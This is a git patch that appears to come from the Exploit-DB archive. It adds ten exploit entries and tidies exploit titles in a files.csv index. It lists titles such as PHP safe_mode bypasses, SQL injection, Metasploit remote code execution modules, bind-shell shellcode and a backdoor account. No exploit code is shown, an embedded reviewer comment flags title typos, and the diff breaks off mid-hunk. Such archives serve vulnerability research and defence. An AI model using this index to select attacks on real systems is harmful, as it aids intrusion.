From 6ab9a26ee41ef1aff224c17e9efcad4e24364024 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 27 Jun 2017 05:01:26 +0000 Subject: [PATCH] DB: 2017-06-27 10 new exploits PHP Exif Extension - 'exif_read_data()' Function Remote Denial of Service PHP 'Exif' Extension - 'exif_read_data()' Function Remote Denial of Service PHP phar extension 1.1.1 - Heap Overflow PHP 'phar' Extension 1.1.1 - Heap Overflow PHP 5.2.1 GD Extension - '.WBMP' File Integer Overflow Vulnerabilities PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow Vulnerabilities PHP 5.3.1 - 'session_save_path()' 'Safe_mode' Restriction-Bypass PHP 5.3.1 - 'session_save_path()' 'Safe_mode()' Restriction Bypass Exploiot PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Function Denial of Service PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak Denial of Service PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak Denial of Service PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Function Plaintext Data Memory Leak Denial of Service PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Function Ciphertext Data Memory Leak Denial of Service unrar 5.40 - VMSF_DELTA Filter Arbitrary Memory Write unrar 5.40 - 'VMSF_DELTA' Filter Arbitrary Memory Write NTFS 3.1 - Master File Table Denial of Service LAME 3.99.5 - 'II_step_one' Buffer Overflow LAME 3.99.5 - 'III_dequantize_sample' Stack-Based Buffer Overflow IBM DB2 9.7 / 10.1 / 10.5 / 11.1 - Command Line Processor Buffer Overflow PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit PHP 'COM' Extensions - (inconsistent Win32) 
'safe_mode' Bypass Exploit PHP 5.2.3 Tidy extension - Local Buffer Overflow PHP 5.2.3 'Tidy' Extension - Local Buffer Overflow PHP 5.2.3 - Win32std ext. Safe_mode/disable_functions Protections Bypass PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit PHP 5.x - (Win32service) Local 'Safe_Mode()' Bypass Exploit PHP FFI Extension 5.0.5 - Local Safe_mode Bypass PHP Perl Extension - Safe_mode BypassExploit PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass Exploit PHP 'Perl' Extension - 'Safe_mode' Bypass Exploit PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass PHP 4.4.7 / 5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass PHP 5.x - COM functions Safe_mode and disable_function Bypass PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass PHP 5.2.6 - (error_log) Safe_mode Bypass PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit PHP - Safe_mode Bypass via proc_open() and custom Environment PHP - 'Safe_mode' Bypass via 'proc_open()' and custom Environment PHP python extension safe_mode - Bypass Local PHP 'python' Extension - 'safe_mode' Local Bypass Exploit PHP 3 < 5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass PHP 5.2 - Session.Save_Path() Safe_mode and open_basedir Restriction Bypass PHP 5.2 - Session.Save_Path() 'Safe_mode' / 'open_basedir' Restriction Bypass PHP 5.2 - FOpen Safe_mode Restriction-Bypass PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass Exploit PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' / 'open_basedir' Restriction Bypass Vulnerabilities suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass suPHP 0.7 - 
'suPHP_ConfigPath' Safe_Mode() Restriction Bypass Exploit PHP 5.2.9 cURL - 'Safe_mode' and 'open_basedir' Restriction-Bypass PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass Exploit JAD Java Decompiler 1.5.8e - Buffer Overflow Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass/RCI Exploit Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass / Remote Code Injection Exploit Network Tool 0.2 PHP-Nuke Addon - MetaCharacter Filtering Command Execution PHP-Nuke Network Tool 0.2 Addon - MetaCharacter Filtering Command Execution PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure PHP 4.x/5.x - 'Html_Entity_Decode()' Information Disclosure PHP 4.x - copy() Function Safe Mode Bypass PHP 4.x - 'copy()' Function 'Safe_Mode' Bypass Exploit PHP 5.2.5 - cURL 'safe mode' Security Bypass PHP 5.2.5 - cURL 'safe_mode' Security Bypass Exploit PHP 5.x (5.3.x 5.3.2) - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities PHP 5.3.x < 5.3.2 - 'ext/phar/stream.c' / 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit) Crypttech CryptoLog - Remote Code Execution (Metasploit) Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit) Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit) Linux/x86 - Bind Shell Shellcode (75 bytes) JiRos Banner Experience 1.0 - (Create Authentication Bypass) Remote Exploit JiRos Banner Experience 1.0 - Create Authentication Bypass Remote Exploit XOOPS myAds Module - (lid) SQL Injection XOOPS myAds Module - 'lid' SQL Injection PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Inject Exploit Kolang - proc_open PHP safe mode Bypass 4.3.10 - 5.3.0 Exploit 
Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass Exploit SmarterMail 7.x (7.2.3925) - Persistent Cross-Site Scripting SmarterMail 7.x (7.2.3925) - LDAP Injection SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting SmarterMail < 7.2.3925 - LDAP Injection MaticMarket 2.02 for PHP-Nuke - Local File Inclusion PHP-Nuke MaticMarket 2.02 - Local File Inclusion WordPress Plugin BuddyPress plugin 1.5.x < 1.5.5 - SQL Injection WordPress Plugin BuddyPress Plugin 1.5.x < 1.5.5 - SQL Injection Search Enhanced Module 1.1/2.0 for PHP-Nuke - HTML Injection PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection SonicWALL Gms 7.x - Filter Bypass & Persistent Exploit SonicWALL Gms 7.x - Filter Bypass / Persistent Exploit Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Exploit Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass / Persistent Exploit PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock) PHP < 5.6.2 - 'disable_functions()' Bypass Exploit (Shellshock) phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection pragmaMx 1.12.1 - modules.php URI Cross-Site Scripting pragmaMx 1.12.1 - 'modules.php' URI Cross-Site Scripting Glossaire Module for XOOPS - '/modules/glossaire/glossaire-aff.php' SQL Injection XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection ATutor LMS - install_modules.php Cross-Site Request Forgery / Remote Code Execution ATutor LMS - 'install_modules.php' Cross-Site Request Forgery / Remote Code Execution vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API Eltek SmartPack - Backdoor Account --- files.csv | 116 ++++++++------- platforms/cgi/remote/42257.rb | 108 ++++++++++++++ platforms/hardware/webapps/42252.txt | 86 ++++++++++++ platforms/lin_x86/shellcode/42254.c | 98 +++++++++++++ 
platforms/linux/dos/42258.txt | 91 ++++++++++++
platforms/linux/dos/42259.txt | 91 ++++++++++++
platforms/linux/local/42255.py | 103 ++++++++++++++
platforms/multiple/dos/42260.py | 95 +++++++++++++
platforms/python/remote/42251.rb | 202 +++++++++++++++++++++++++++
platforms/windows/dos/42253.html | 26 ++++
platforms/windows/remote/42256.rb | 159 +++++++++++++++++++++
11 files changed, 1122 insertions(+), 53 deletions(-)
create mode 100755 platforms/cgi/remote/42257.rb
create mode 100755 platforms/hardware/webapps/42252.txt
create mode 100755 platforms/lin_x86/shellcode/42254.c
create mode 100755 platforms/linux/dos/42258.txt
create mode 100755 platforms/linux/dos/42259.txt
create mode 100755 platforms/linux/local/42255.py
create mode 100755 platforms/multiple/dos/42260.py
create mode 100755 platforms/python/remote/42251.rb
create mode 100755 platforms/windows/dos/42253.html
create mode 100755 platforms/windows/remote/42256.rb
diff --git a/files.csv b/files.csv
index 41b4e45df..9b1704a45 100644
--- a/files.csv
+++ b/files.csv
@@ -1904,7 +1904,7 @@ id,file,description,date,author,platform,type,port
 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - Null Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0
 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,AtT4CKxT3rR0r1ST,windows,dos,0
 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0
-16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension - 'exif_read_data()' Function Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0
+16261,platforms/multiple/dos/16261.txt,"PHP 'Exif' Extension - 'exif_read_data()' Function Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0
 16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0
 16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0
 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
@@ -1956,7 +1956,7 @@ id,file,description,date,author,platform,type,port
 17163,platforms/windows/dos/17163.txt,"Microsoft Reader 2.1.1.3143 - Array Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0
 17164,platforms/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 - Null Byte Write",2011-04-12,"Luigi Auriemma",windows,dos,0
 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0
-17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0
+17201,platforms/multiple/dos/17201.php,"PHP 'phar' Extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0
 17222,platforms/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos,0
 17227,platforms/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)",2011-04-29,webDEViL,windows,dos,0
 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0
@@ -3781,7 +3781,7 @@ id,file,description,date,author,platform,type,port
 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0
 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple '.BMP' Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0
 29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple .BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0
-29823,platforms/php/dos/29823.c,"PHP 5.2.1 GD Extension - '.WBMP' File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0
+29823,platforms/php/dos/29823.c,"PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0
 29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service",2007-04-09,"Jean Delvare",linux,dos,0
 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 - Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos,0
 29850,platforms/windows/dos/29850.txt,"eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities",2007-04-12,"Leon Juranic",windows,dos,0
@@ -4253,7 +4253,7 @@ id,file,description,date,author,platform,type,port
 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0
 33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",multiple,dos,0
 33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0
-33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'Safe_mode' Restriction-Bypass",2010-02-11,"Grzegorz Stachowiak",php,dos,0
+33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'Safe_mode()' Restriction Bypass Exploiot",2010-02-11,"Grzegorz Stachowiak",php,dos,0
 33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow (PoC)",2014-06-11,"Gabor Seljan",windows,dos,0
 33677,platforms/php/dos/33677.txt,"PHP 5.3.1 - LCG Entropy Security",2010-02-26,Rasmus,php,dos,0
 33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service",2010-02-24,Nicob,linux,dos,0
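Review bot: The new 33625 title introduces a typo, `Exploiot`, and appends `()` to `Safe_mode`, which is a php.ini directive rather than a function, so the added line should read `+33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'Safe_mode' Restriction Bypass Exploit",2010-02-11,"Grzegorz Stachowiak",php,dos,0`. The same `()` suffix is introduced on the 4236 (`'Safe_Mode()'`) and 4553 (`'Safe_mode()'`) lines in the later hunks, while the 3429, 4218, 4517 and 7503 lines in this commit settle on `'safe_mode'` and the 4311, 4314 and 7393 lines on `'Safe_mode'`; since the commit is normalising these titles, one spelling across all of them would be expected. The commit subject repeats the `Exploiot` typo and would need the same correction.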
@@ -4266,7 +4266,7 @@ id,file,description,date,author,platform,type,port
 33733,platforms/windows/dos/33733.pl,"httpdx 1.5.3 - '.png' File Handling Remote Denial of Service",2010-03-10,"Jonathan Salwan",windows,dos,0
 33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0
 33737,platforms/hardware/dos/33737.py,"ZTE / TP-Link RomPager - Denial of Service",2014-06-13,"Osanda Malith",hardware,dos,0
-33755,platforms/php/dos/33755.php,"PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
+33755,platforms/php/dos/33755.php,"PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
 33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - .AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0
 33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos,0
 33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service",2010-03-20,Rick2600,windows,dos,0
@@ -4423,11 +4423,11 @@ id,file,description,date,author,platform,type,port
 35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",linux,dos,0
 35465,platforms/multiple/dos/35465.pl,"VideoLAN VLC Media Player 1.0.5 - '.ape' Denial of Service",2011-03-15,KedAns-Dz,multiple,dos,0
 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 - Tag Nesting Remote Denial of Service",2010-12-21,anonymous,linux,dos,0
-35483,platforms/php/dos/35483.txt,"PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0
-35484,platforms/php/dos/35484.php,"PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0
+35483,platforms/php/dos/35483.txt,"PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0
+35484,platforms/php/dos/35484.php,"PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0
 35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0
-35486,platforms/php/dos/35486.php,"PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0
-35487,platforms/php/dos/35487.php,"PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0
+35486,platforms/php/dos/35486.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Function Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0
+35487,platforms/php/dos/35487.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Function Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0
 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0
 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
@@ -5589,11 +5589,15 @@ id,file,description,date,author,platform,type,port
 42242,platforms/windows/dos/42242.cpp,"Microsoft Windows - 'nt!NtQueryInformationResourceManager (information class 0)' Kernel Stack Memory Disclosure",2017-06-23,"Google Security Research",windows,dos,0
 42243,platforms/windows/dos/42243.txt,"Microsoft Windows - Kernel ATMFD.DLL Out-of-Bounds Read due to Malformed Name INDEX in the CFF Table",2017-06-23,"Google Security Research",windows,dos,0
 42244,platforms/windows/dos/42244.cpp,"Microsoft Windows - 'nt!NtQueryInformationWorkerFactory (WorkerFactoryBasicInformation)' Kernel Stack Memory Disclosure",2017-06-23,"Google Security Research",windows,dos,0
-42245,platforms/multiple/dos/42245.txt,"unrar 5.40 - VMSF_DELTA Filter Arbitrary Memory Write",2017-06-23,"Google Security Research",multiple,dos,0
+42245,platforms/multiple/dos/42245.txt,"unrar 5.40 - 'VMSF_DELTA' Filter Arbitrary Memory Write",2017-06-23,"Google Security Research",multiple,dos,0
 42246,platforms/windows/dos/42246.html,"Microsoft Edge - 'CssParser::RecordProperty' Type Confusion",2017-06-23,"Google Security Research",windows,dos,0
 42247,platforms/multiple/dos/42247.txt,"Adobe Flash - AVC Edge Processing Out-of-Bounds Read",2017-06-23,"Google Security Research",multiple,dos,0
 42248,platforms/multiple/dos/42248.txt,"Adobe Flash - Image Decoding Out-of-Bounds Read",2017-06-23,"Google Security Research",multiple,dos,0
 42249,platforms/multiple/dos/42249.txt,"Adobe Flash - ATF Parser Heap Corruption",2017-06-23,"Google Security Research",multiple,dos,0
+42253,platforms/windows/dos/42253.html,"NTFS 3.1 - Master File Table Denial of Service",2017-06-26,EagleWire,windows,dos,0
+42258,platforms/linux/dos/42258.txt,"LAME 3.99.5 - 'II_step_one' Buffer Overflow",2017-06-26,"Agostino Sarubbo",linux,dos,0
+42259,platforms/linux/dos/42259.txt,"LAME 3.99.5 - 'III_dequantize_sample' Stack-Based Buffer Overflow",2017-06-26,"Agostino Sarubbo",linux,dos,0
+42260,platforms/multiple/dos/42260.py,"IBM DB2 9.7 / 10.1 / 10.5 / 11.1 - Command Line Processor Buffer Overflow",2017-06-26,defensecode,multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -6011,7 +6015,7 @@ id,file,description,date,author,platform,type,port
 3424,platforms/multiple/local/3424.php,"PHP 5.2.1 - substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0
 3426,platforms/linux/local/3426.php,"PHP < 4.4.5 / 5.2.1 - (shmop functions) Local Code Execution",2007-03-07,"Stefan Esser",linux,local,0
 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure",2007-03-07,"Stefan Esser",linux,local,0
-3429,platforms/windows/local/3429.php,"PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit",2007-03-07,anonymous,windows,local,0
+3429,platforms/windows/local/3429.php,"PHP 'COM' Extensions - (inconsistent Win32) 'safe_mode' Bypass Exploit",2007-03-07,anonymous,windows,local,0
 3431,platforms/windows/local/3431.php,"PHP 4.4.6 - crack_opendict() Local Buffer Overflow (PoC)",2007-03-08,rgod,windows,local,0
 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0
 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0
@@ -6069,19 +6073,19 @@ id,file,description,date,author,platform,type,port
 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,windows,local,0
 4028,platforms/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local,0
 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - '.lst' Local Buffer Overflow",2007-06-08,n00b,windows,local,0
-4080,platforms/windows/local/4080.php,"PHP 5.2.3 Tidy extension - Local Buffer Overflow",2007-06-19,rgod,windows,local,0
+4080,platforms/windows/local/4080.php,"PHP 5.2.3 'Tidy' Extension - Local Buffer Overflow",2007-06-19,rgod,windows,local,0
 40465,platforms/linux/local/40465.txt,"Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials",2016-10-05,KoreLogic,linux,local,0
 4165,platforms/windows/local/4165.c,"WinPcap 4.0 - 'NPF.SYS' Privilege Escalation (PoC)",2007-07-10,"Mario Ballano Bárcena",windows,local,0
 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak (PoC)",2007-07-10,dreyer,linux,local,0
 4178,platforms/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Privilege Escalation",2007-07-12,"Zohiartze Herce",windows,local,0
 4203,platforms/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords Exploit",2007-07-19,bunker,multiple,local,0
 4204,platforms/windows/local/4204.php,"PHP 5.2.3 - snmpget() object id Local Buffer Overflow",2007-07-20,shinnai,windows,local,0
-4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. Safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0
+4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass",2007-07-24,shinnai,windows,local,0
 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0
 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0
 4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0
 4233,platforms/aix/local/4233.c,"IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0
-4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0
+4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local 'Safe_Mode()' Bypass Exploit",2007-07-27,NetJackal,windows,local,0
 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0
 4257,platforms/windows/local/4257.c,"Panda AntiVirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0
 4262,platforms/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - '.ply' Buffer Overflow",2007-08-06,n00b,windows,local,0
@@ -6090,22 +6094,22 @@ id,file,description,date,author,platform,type,port
 4274,platforms/windows/local/4274.php,"PHP 5.2.3 - snmpget() object id Local Buffer Overflow (EDI)",2007-08-09,Inphex,windows,local,0
 4302,platforms/windows/local/4302.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (1)",2007-08-22,Inphex,windows,local,0
 4303,platforms/windows/local/4303.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (2)",2007-08-22,NetJackal,windows,local,0
-4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass",2007-08-23,NetJackal,windows,local,0
-4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0
+4311,platforms/windows/local/4311.php,"PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass Exploit",2007-08-23,NetJackal,windows,local,0
+4314,platforms/windows/local/4314.php,"PHP 'Perl' Extension - 'Safe_mode' Bypass Exploit",2007-08-25,NetJackal,windows,local,0
 4325,platforms/windows/local/4325.php,"XAMPP for Windows 1.6.3a - Privilege Escalation",2007-08-27,Inphex,windows,local,0
 4345,platforms/windows/local/4345.c,"Norman Virus Control - 'nvcoaft51.sys' ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0
 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0
 4355,platforms/windows/local/4355.php,"OtsTurntables 1.00 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0
 4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 - VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0
 4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0
-4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
+4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit",2007-09-10,"Mattias Bengtsson",multiple,local,0
 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
 4460,platforms/lin_x86-64/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",lin_x86-64,local,0
 4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0
 4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0
-4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
